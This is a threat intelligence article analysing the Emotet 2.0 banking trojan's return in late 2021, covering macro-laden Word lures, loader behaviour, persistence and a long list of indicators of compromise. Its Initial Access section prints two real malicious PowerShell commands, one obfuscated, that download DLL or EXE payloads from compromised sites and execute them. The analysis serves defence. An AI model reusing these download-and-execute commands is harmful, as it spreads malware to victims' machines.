Emotet 2.0: Everything you need to know about the new Variant of the Banking Trojan

Since it was first identified in 2014, the Emotet banking trojan has been a persistent threat that has affected over 1.6 million computers and led to millions of dollars in loss. However, in January 2021 a collaborative effort between law enforcement in several countries, coordinated by Europol and Eurojust, dismantled the operations of Emotet, which was followed by several arrests in Ukraine.

Despite the disruptions in their operations, within 9 months, in November 2021, new Emotet samples were discovered in the wild. Though the new variant of Emotet is very similar to the previous bot code, it differs in the encryption scheme used for command and control communications.

In this article, we delve into the technical aspects of the re-emerged Emotet malware dubbed Emotet 2.0.

Analyzed Samples

Emotet 2.0 has been analyzed based on the following samples:

Documents:

349d13ca99ab03869548d75b99e5a1d0
eb02f3635fbe19caf518a59aceb753ed

PE Images:

4b957e4473826a37066f4489f5abbed4

Initial Access

After almost a year-long hiatus, the Emotet malware has returned to the threat landscape through spamming campaigns. Adversaries are using weaponized Microsoft Word document files to spread the infection.

As shown in the image below, users are tricked into clicking “Enable Content” to execute the malicious Macros that downloads Emotet malware hosted on various WordPress websites compromised by the attackers.

*Malicious Macros used to download Emotet*

Having extracted the malicious Macros embedded in the document, we found that:

The Macros are heavily obfuscated to hinder the analysis.
After deobfuscation, we observed that the Macros execute the Powershell command on the victim system to fetch the Emotet payload from the attacker’s infrastructure.
After analyzing multiple files, we observed that the campaign uses different PE image files, like executable and DLLs (Dynamic-link libraries), to spread the malware.
While some campaigns leverage DLL files to deploy the malware, others use .exe files to deploy it.

*The malicious Macros extracted from the document*

The images below illustrate the different Powershell payloads from multiple malicious documents:

Powershell payload that downloads DLL files

powershell $dfkj=“$strs=\”http://toupai80.com/wp-admin/C7TNEk/,http://phpnan.com/rajaship/AGV4lxu7XvcyjjvIZ29g/,http://alfadandoinc.com/67oyp/m55JgEVxA1SYr3dXpEJw/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/yuOeppNKhbJiW/,http://comtamutthang.com/wp-content/uploads/5U4OLMs/,http://ec2-54–206–92–66.ap-southeast-2.compute.amazonaws.com/licenses/yB2dXUFf3YYI9uAg/,http://riven3.online/wp-content/SFTwXTjrYTM/\“.Split(\”,\“);foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\”c:\programdata\\\“+$r1+\”.dll\“;Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\”c:\windows\syswow64\rundll32.exe\“;$a=$tpth+\”,f\“+$r2;Start-Process $fp -ArgumentList $a;break;}};”;IEX $dfkj

When the payload is DLL, the campaign uses Rundll32 to execute an exported function Control_RunDLL to deploy the Emotet payload.

Powershell payload that downloads .exe files:

powershell -e
$M6hq9p5=((‘Q’+‘tx’)+(‘dzs’+‘h’));.(‘new’+‘-ite’+‘m’) $eNV:useRpROfILe\sqPgDfi\dQKGpwC\ -itemtype DIrEctorY;::“S`E`cURi`TYProt`OCOL” = ((‘tl’+‘s12,’+‘ ‘)+‘t’+(‘ls’+‘1’)+(‘1,’+‘ tls’));$Qfifov7 = ((‘E’+‘2937’)+‘a’+‘4y’);$Edgv38b=((‘Myu’+‘n’)+‘q’+‘wl’);$Vlxiw69=$env:userprofile+((‘y’+‘Ap’+‘S’+(‘q’+‘pgd’)+(‘fiyA’+‘pD’)+‘q’+(‘k’+‘gpwcyA’)+‘p’)-CREplaCE (‘yA’+‘p’),92)+$Qfifov7+(‘.e’+‘xe’);$Utute3w=((‘S_’+‘zyk’)+‘7r’);$By1b2vx=&(‘n’+‘e’+‘w-object’) neT.wEbcLiENt;$Mv5ki8y=((‘h’+‘ttp’+‘:/’)+‘/’+(‘fort’+‘c’)+(‘oll’+‘in’)+(‘sa’+‘thl’)+(‘e’+‘tef’)+‘ac’+‘t’+‘o’+‘ry’+‘.c’+‘om’+(‘/wp-a’+‘dm’+‘in’+‘/i/’)+(‘*h’+‘tt’)+‘p:’+‘/’+‘/’+‘g’+‘et’+‘m’+(‘i’+‘ng.c’)+‘om’+‘/’+‘fo’+‘ru’+‘m/’+(‘p’+‘/*h’)+‘t’+(‘tp://’+‘g’)+‘af’+‘f’+(‘a-‘+‘mu’)+(‘s’+‘ic.’)+(‘co’+‘m/c’)+(‘gi-‘+‘bi’)+‘n’+‘/’+(‘UM’+‘/’)+(‘*htt’+‘p’)+‘:/’+‘/f’+(‘ran’+‘k’+‘fur’)+‘te’+(‘lf’+‘a’)+(‘r’+‘ol’+‘i’+‘llo’+‘.com/las’)+(‘e’+‘u/c7’+‘/’)+‘*’+(‘htt’+‘p’+‘://evilnerd’)+‘.o’+‘rg’+(‘/cgi-‘+‘b’)+(‘in’+‘/nU’)+(‘i’+‘/*h’)+‘t’+‘t’+(‘p’+‘:/’)+(‘/ga’+‘p’)+‘e’+‘sm’+(‘m.or’+‘g/o’)+(‘l’+‘d/’+‘M/*ht’)+‘tp’+‘:/’+(‘/’+‘gr’)+(‘m’+‘l’+‘.net’)+(‘/w’+‘p’)+(‘/C’+‘/’)).“sPL`It”(42);$On3lyc7=((‘P’+‘ah’)+‘6y’+‘h1’);foreach($Dckyilg in $Mv5ki8y){try{$By1b2vx.“dOW`N`LoadfIlE”($Dckyilg, $Vlxiw69);$Qfdsif0=((‘M’+’06’)+‘3i’+‘n4’);If ((&(‘Get-It’+’em’) $Vlxiw69).“lEN`gth” -ge 32254) {&(‘Invo’+‘k’+‘e’+‘-Item’)($Vlxiw69);$N5d6_0z=((‘Y8’+‘e’)+‘v’+(‘2u’+‘t’));break;$Obf305o=((‘J51’+‘i’)+‘d’+‘oi’)}}catch{}}$Pyfnxkx=((‘K6ki5’+‘5’)+‘2’)

When the payload is a .exe executable file, the Powershell payload fetches the .exe file from the attacker’s infrastructure and executes on the victim’s system.

Emotet Malware Payload

The Win32API IsProcessorFeaturePresent is commonly used in malware for anti-debug purposes.
The argument value 0xA is passed to the API to check if the SSE2 instruction set is available on the victim system. Here, 0xA represents the constant value: PF_XMMI64_INSTRUCTIONS_AVAILABLE.
Systems that support the SSE2 instruction set can use special registers xmmn, where n can have values from 0 — 7.
Later in the process the malware uses xmmn registers to transfer data.

Loading Mechanism

The DLL/exe file dropped by the malicious document acts as a dropper to deploy the Emotet malware. The analyzed DLL has a PE image hidden inside it as shown in the image below:

Here, the malware uses the SSE2 instruction set for data transfer, i.e. the xmmn registers transfer hidden payload bytes within the malware.

The code responsible for transferring hidden payload bytes within the malware

The malware then allocates memory to dump the hidden Emotet payload using VirtualAlloc Win32 api.
The argument 0x40 has a value of PAGE_EXECUTE_READWRITE, which sets the permission of the newly allocated memory to read, write, and execute.

The malware copies the hidden PE image into an address starting from 0x10000000. The address of the newly allocated memory can be found in the EAX register, as shown below:

As seen in the image below, the memory permissions for the region 0x10000000 to 0x00028000 have been set to ERW (Execute, Read, Write).

The malware uses the code seen below, to copy the PE image, segment by segment, into the newly allocated memory with Execute, Read, Write permission.

After transfering the byte, the newly allocated memory has a PE image with its MZ header, and the segments are ready to be executed by the malware.

The malware then transfers control to a hidden payload by calling the memory address 0x100143B3.

The image below shows the value stored in the Stack, when the above call happens. The execution starts from address 0x100143B3 in the newly allocated memory.

Subsequently, the Emotet malware is executed. The shellcode is polymorphic in nature as each set of shellcode bytes are encoded by XORing with a key value to evade signature based detection as shown in the image below. The basic functionalities of the shellcode are covered in the System Wide Activity section.

Finally the Emotet shellcode exits from the system.

Extracting the Emotet Payload

The PE image hidden in the loader has a hash value of 9DA12DAF87DFF61804EDF0ECE87E1DA2, which is PE image DLL32 and has no exported functions.
The instructions in the DLL are dynamically decoded using XOR to evade detection.
There are no hits on VirusTotal for this hash.

System-Wide Activity

The Emotet malware spawns a new process of Rundll32 with a new command line. This is responsible for maintaining connection with the attacker’s C2 (Command and Control) server.

In the new command line shown below, we can see the malware has already been able to write the file in C:\Users\<user>\AppData\Local\<Random_string>\<random>.<random_extension>. We have confirmed that the file written in this extension is the same as the initial file dropped from the malicious document.

It is not in the nature of the Rundll32 system program to make network connections. However, because the malware is executed via Rundll32, we can see live traffic from it on the system, when it connects to the attacker’s Infrastructure.

*Network activity of the malware making connections to external assets.*

The persistence mechanism employed by Emotet is a classic technique that utilizes the Run registry key. As mentioned above, a PE image is written to: C:\Users\<user>\AppData\Local\<Random_string>\ directory as <random_string>.<random_extension>. After which, the Rundll32 is abused to run the exported function in the DLL.

Indicators of Compromise (IOCs)

URL
http://141.94.176.124/Loader_90563_1.dll	http://104.130.140.69:8080
http://122.129.203.163:443	http://178.79.144.87:443
http://188.165.214.166:7080	http://202.29.239.161:443
http://31.220.49.39:8080	http://41.76.108.46:8080
http://51.178.186.134:443	http://51.79.205.117:8080
http://51.91.142.158:80

IPv4
141.94.176.124	87.120.8.170	51.91.142.158	218.101.110.3	178.79.144.87
98.0.159.122	87.120.8.112	51.79.205.117	217.165.237.42	178.134.47.166
97.83.40.67	87.120.8.109	51.68.138.110	209.33.231.203	178.128.222.53
97.107.134.115	87.120.8.101	51.210.242.234	207.246.112.221	177.67.137.111
95.110.160.239	87.120.37.77	51.178.61.60	204.174.223.210	170.130.55.98
94.28.78.200	87.120.37.231	51.178.186.134	202.179.185.203	167.71.11.125
93.48.80.198	87.120.37.183	50.21.183.143	201.172.31.95	164.68.99.3
93.188.167.97	87.120.37.122	5.189.150.29	200.7.198.138	156.19.152.218
92.38.128.47	87.120.254.96	49.248.217.170	200.236.218.62	154.79.251.172
91.92.109.73	87.120.254.6	45.79.80.198	200.114.247.160	154.79.244.182
91.92.109.189	87.120.254.51	45.63.36.79	198.199.70.22	144.91.110.219
91.92.109.14	87.120.254.252	45.36.99.184	194.36.28.26	142.93.218.86
91.92.109.138	87.120.254.234	45.116.106.45	194.190.18.122	142.44.247.57
91.92.109.136	87.120.254.178	41.76.108.46	192.99.150.39	14.102.188.227
91.92.109.10	87.120.254.158	37.57.82.112	191.36.151.129	117.54.140.98
91.83.88.122	86.97.10.14	36.91.186.235	190.93.208.53	117.220.229.162
91.243.125.5	85.88.174.94	36.67.109.15	190.152.4.202	113.160.37.196
91.207.28.33	80.6.192.58	31.173.137.49	189.147.174.121	110.172.137.20
91.178.126.51	80.211.40.191	31.173.137.47	189.135.21.162	103.77.205.102
91.121.134.180	79.143.186.143	31.173.137.39	187.19.167.233	103.36.126.221
89.107.190.111	77.232.163.203	31.13.195.32	186.97.172.178	103.150.68.124
87.97.178.92	75.176.235.182	31.13.195.152	186.32.3.108	103.146.232.154
87.121.52.247	74.63.218.139	31.13.195.145	186.225.119.170	103.109.247.10
87.121.52.230	69.64.50.41	31.13.195.13	185.99.2.197	107.170.4.227
87.121.52.173	67.207.95.35	31.13.195.129	185.9.187.10	142.4.219.173
87.120.8.245	67.205.162.68	31.13.195.108	185.242.89.198	158.69.118.130
87.120.8.241	64.251.25.156	27.5.4.111	185.242.88.63	206.189.150.190
87.120.8.177	54.39.98.141	24.28.12.23	184.74.99.214	52.73.70.149
87.120.8.171	54.37.70.105	23.253.208.162	181.176.174.139	54.191.98.150

File Hash – SHA256
fc0d549104f2c18619758a5ca56847c65e16981121dfebc50b9a8eebc886573b	f717350418d58d2ba6c0492794508bc7cd5d3cdfcb3c4334276dba94048863bf	f5aa35e755dc8ff542bcf50eb9274e9fc265b0ab9cdc2beb810cf4cbf67d3c64
f57b21a4d6338a3d3552216e1cd2a39cfdc58310bce524d8f63004ee71aa2938	f227c59532fa2aad62305a79cac5e13019a7d969765758a86218b85b004a1ae8	f026dea4f1aab9b7669b67c4a7ff577f949b581186ab2f6c1eb15431f2fa9fd7
f023bf21ed5a54f84d75aa8ec2c0f40628dca0443b0e07375b52a657af838e3c	ef4f5373736a876fbfa74f6e9904f6f23f9c052f3f474d3ba0638cafd518576a	ef2d965156a667d3959525747a5520a6e480cbffb195d7c58156c041f3789488
ef0ee0f3b035a9aff22171da5cb6ce2870aad3ff4482ff36dcc54e8ee9c9c4fe	edf90b6422680bf15e95c8ce3fea26162fca3cfdf8dbb6c04f253089c0f77438	e427c37b0e27c236c191953965763f0a8c66b266d42d2fc37035e589aacb782a
e383a83e1f5c3c207418d26d3bfd88fb176c4e83f54bc07b2c9c783e09e35a15	df68d5f7df57a1109b6a3a1c7b7295ef427a8a2542cee5bc8654eab0aad97433	dc38a213f9b252a7222852f29a475007f78666597c1849b115bfec0e1a0a9100
dc13a72e1e5325435158cc9151c2dc85a21b9f3f3e3bedc3f23a16ca8228dbd2	d7ba34224a23a54ced6d118e44c2cdebc7365cae81e168aa6f3cb72b5467de83	cd7484a0818f37a34a430a8b9a3c3b30d722bbe30e9765b76c65a2d98a62f45b
ccda6d2b252f30164eb8947e2ec403bf84f023988e678cb91892a95bfc051131	cc73ad809eeba4440454fce00ee8d2076a57c6a64761af465f8f34cdc385d183	cc2a34aef14a925ef35c536f73d1a2e1e72d3e171050412c967fba5875f2b972
cb5ac045795644ed2f7aeadc1526f438375248bb6cdedf300015a1978245a32a	c9aaf815abe2d627ea9ac3ee7fa9fa62971a3710acd33a438a4581ee95af6742	c952865b866eab0825e6957c56defcd77b28acdb42380a0068938e2ca596b433
c436e7c76e37650fe6c6efb6ffb5836bbce8b192c2b750bfcb0f089b255a0e0f	c3235d8500c49161130b852defb4963e68e78bd149714e7f7c850e9587357ab4	c271b7e39c668f97767c6d7b70d76c96d120f441f73bd7c0b28a6644b02660f0
c199e4c4607e53ad448227314fa7f31d7464e9d4138446d32ddf7e1390a3e794	bc1a988b403559ad5da8b393414bec3bbed8cc3016476d9dd63779947638b1c8	bb7d79a6ab69448866dd319b9b9d1f74f99a57a722cd9cd3afda41800c726ed0
ba3b47d0e52f983be9c585e9b30f4af080249836cd7c9e1b401d19b7db7cf939	b7bb028310c3e03f25ffb3955e2f9fd2018caaf2da268ed0eea2306981a9f0ce	b3f3ef5f6dea6df51144fa43a94472d2da7a2829475067546144215cf6f8f847
b243bf0122828c99bf083af2f324b5f336aa46769fd94349eb2a9828bbdefc86	ad278f4cf2e1eaa01f4a77db435f66f15cd49e6a8e3af5f04998fbeff8277a6c	a77662ae07a265db6ebe7aadc028b17faa721f87709b90f63377382de597cd9f
9d4d9beaaeeac9fa7c3e6dcbcfa13da3619a28d20ec820de8ee9a6bfe952c148	9c2148eb0d49971908766b1c9c1875b7e8a627347ed19458ff2f8fa2388275fb	9b27642c57f9a8a49a9cf09088d18b7c1a114824471aa8a580cc86dcfa6cadca
9af62bbd1381d9566f907d99a7cfc9f532936cddb04f359736aa4bd3231ad020	9721c3df9f18b63c21f81604cf7b0d1ae45e603eb9d6d85189298b7e39a6ba00	9192b2e2d5dca0cebe7e77f6413fc23edb2df7257f2282e39c932195106a242f
918fb07d648cd5235b6361d30256c37c4bc07cd4c3312b713276d035e0004fa6	8d728385d57b0bcd128751ace9f7550c210e841a41ba366c09d8cbcd7831a32b	8b04dae355b3552acb72f9fa011d24a588f5614862ec211c3007fbc7da2302e3
88e8fa38140a1a3f906fac5b9a526132e978cc9c2de05ee3b5a49ff8f312c03e	86a6f7971fae83e42ff5af58c1364a66a9f40f0fbe6f88f536e8746aed0519bc	850415df59de3c12790e28538eb622713095dff4fa7a3913ff0db670ffe7be55
84e9eff680264b95cbc8fe0bb3850a9c0ac11a9d0e33d867744ec720fcef875f	83b01c1031a2f40d9d563363eded81373d19815ded57596bb467c06726429304	82f9d9279b752c4c7b6ca40c737a09b55e4be09d96093351bb6b0614f12d08ed
82f9d9279b752c4c7b6ca40c737a09b55e4be09d96093351bb6b0614f12d08ed	824a6047233e2ac4af1ec01470fa6c92aafeb4edbe50170ffcd8a71fbdaaf3d6	7c3fc23ce0f9dcc2538e4ebaff55f1a11a0dc4edd5db8630568991be900b3049
7b428765408589b1783d877924b1904c74036346a6d6561e064a50e68d25f9f3	7a36f90f9decaa862fad06b462cfe9756778e786345f84585fe0ce66e2a5398e	77c941b5df7cb5ce65cbab1a8654ea3d051cc2040c970d1332f8e364e5c6ec86
77bfee9cb826154ed07a2d8aef0b58e434984185751a0c0b35d080f3d816bf0a	77bdae696540c67e4c9fa5243667723191f2c7724280c4a566f0bdafa29b659c	74d6cdf21a4541d70de74683717f720a7466b1dd198c750d9d1ecd822e189208
6d679474a78796803d07ce6fe31a215ac9f5de7e6cc4e29ccfff6cd809af2360	65b0db343f74c2d2df9af530ce27b7b4e80a9a4b644d6f422b139cbf787c87e8	633ecda615b83fdc196481ecbef852fdded72a17273a35d7c840a8b0c3223dc4
62bcc4f1d51e92b4bf4797acd41bd9bcb0d66750e5c90555f6cc5d0bfa105581	62792a0de7959a7e4352fecea08adc050e22c965f6bd100a246bde5fd8f0121d	61761e3f9abe1ee6efbf6da1155b176e09e8a9b1d30185be156316ea85e1db72
5fef57576da8bcbb07d5858148f1fe0b70adddeed7394a4fa112ef9871b6b76d	5fc0e6c51016ae8e1e9fc0d6d96a28833947ce0872b333ef39f42e218c49c7f5	5b5dde6104f330551dd9e704ceabb7252686d39c8d1438d2f7738845e4a56099
59f5ce0c5422c95f739c094cd177f1149d4f8d0d3091f32c959d0dad34e3da98	54533a4f2c942c589c93b8f494a28804b42a8ee049d292faff2a247172b89fce	52cf80799ee7f97e6fc1554c69050939429af807291397f34fc904755f09c2f4
5246f80dc9da8cc6f40241f0846b0ba301604348005fe397704ec39b711c2fda	51ed1a79f300dd22a2fd558296df74cd0ca182d5301d1b22a31189d2009fa5e9	4f952ede4194acdfad1a16a579306058db2f77a3b4237997f9232b89a2b4cb30
4dedc2bfa4657a52c66b190bcf4ff3b35d492bf13f1c8a6705078932e6a4883c	4da56959d4d126c44efbb99be3da0edc21d2e530c91035f7e04d63184d13a4dd	4a09037602a40f4537473e81e9d9b8836bdde8e31a739566198996bcbaf45f7c
47db58b63bcaa028cd345209a11e93334c0c9aad2b895e8a9a72b0c20be8adb6	45aecf95b1011751b81a88542fac64c2a747c445cef48b90b24f6303ea0d09ad	43207ec09c7b92db2af74bd29bab8cd0d8fa4db1a963b6aea43e05b0d0b4bab2
3dc904b04fb0178bed08752004daf9fe3023ba01f5c6a5466b3cf657deb2b1bd	3d605a6edf9007ce53e65c78c62070afc7da2cd1658546fd2e119a4bc03fe52d	3cb2d781894a8eddf2ba22509468ad2a930d129dab905b47c5c34a57fbbce6a9
3b940b1a3d79aeb998d24c750b1d8dd7b2813c0612ffaec14aff9c9761290483	3b51f9935edabda771bd7c33eba789c0552bff3240488e3daa4a1e7b39fb6e20	392075a20616a741c387567a1ee8f9fce2f6c3c49f00744a98a762c4376a24ed
3710b6a12451de36d8743766a129677c0e6f3a95996fdb16819c4fc1503ce0ec	36fcc3252115a11533c543d81f8acb92da975aebbf6593a75a5826765ab92653	36d4e39b92598a49a755d5473f1dfb2488f63c4cd7b8d52ac207c8586173850a
369e3867e57f226e567138dcafaf920c71bfb5ab959c6415f36fc16df1a56a0e	35347dd43af88f9adbbaff8dee84da9c6187bc3583246baa366c9dd6d25e7282	332db3f86eefa8b6b64d6a674534ba90eeb3ccdaf9a51bf8d96783a7eb022b14
2c3812c81ed37982aff0b5a0becf00dffa537da56acca8792c96740ea42b7df3	2b9ad1e926df4c7a6af565fff49e4f1b7c9fad97672de67aad273d8142d229c8	28ec007adeb419a28d66a9d8528506a2c08bc701f9df1647b7d2163b11a4ae1e
2717ddf8dc06e896ac9301202571353e2fa23acb4c9ba5978196e74c62c46909	20e25627fab8de69bac4e94599fab2767df36438697cccfc48e8539649b6dcef	1ede4a8965a495ac04b6fb26abffb5d8025798523f962120841bcb3a1292bd54
1ea47a5d3f11650fc755a28fe54e8ab6557b635145925c23e42fc5eda85e4b8a	1e9345ee7d442805a04bf6bd5eefea8e5de05fde2b60f1362f5d0239d7631e5d	160af42910e5519dd86e183ea1252c59036d58983fc39367dc90cde4dd628801
124449bd0b9097b454c35fa258bda625ff6ecf5bf6f1316d7abb46fad459a273	118aeefa04fb5338c15d7fa9fffa137fd3c1b6c86fb3b32fddf637b50aaa1c36	10404cf5a5d07c02578bfafd321aacefbf03760e1a8337ceeefe1258fc21fd1f
100cc1e3bcc4f5ad7ee601ca99ecaf17bbcf4fbf3878d0375c87cee00dd24756	0e662c5e7cc88a55c15b44685eb78ba249e9164513baa865800e4e1e838bc5a9	0c11f41c35d25e43d218b2d6d9824c44fa0d145761a12c5bc7eda0716d59207b
073e41ee489ae16d60361a9abff708d92df0d3a2a5f7a4d1b05ecfa3880cbead	040760ffb0fb37f80a9654390879a12f036c614b5117f6fded7513db63d42641	02fba2b72a34c3316dc5bca2ac96691eff3f3ea79e257f2dcaa2df972472c9ff
023549c2246838ebf7bbd91c2414de4950c3c0eaabb875e66e24baf410438aa6

File Hash – SHA1
6a45c49225a32a667e17ffe12178e050c3404ab7	224f101b5a67877e66c23506d16f592c410a85e0	06df357c67ea78924e376422056b8cc4deae856c

File Hash – MD5
b6bb0076356aaf68866fb7e68c4a7490	4f174fc64f06938cc1b8c63f9333af6c	10a161593b0105eae03b4883f6566dae

Author Details

Anandeshwar Unnikrishnan

Threat Intelligence Researcher , CloudSEK

Anandeshwar is a Threat Intelligence Researcher at CloudSEK. He is a strong advocate of offensive cybersecurity. He is fuelled by his passion for cyber threats in a global context. He dedicates much of his time on Try Hack Me/ Hack The Box/ Offensive Security Playground. He believes that “a strong mind starts with a strong body.” When he is not gymming, he finds time to nurture his passion for teaching. He also likes to travel and experience new cultures.

Co Authors

Deepanjli Paulraj

Lead Cyberintelligence Editor, CloudSEK

Total Posts: 3

Deepanjli is CloudSEK’s Lead Technical Content Writer and Editor. She is a pen wielding pedant with an insatiable appetite for books, Sudoku, and epistemology. She works on any and all content at CloudSEK, which includes blogs, reports, product documentation, and everything in between.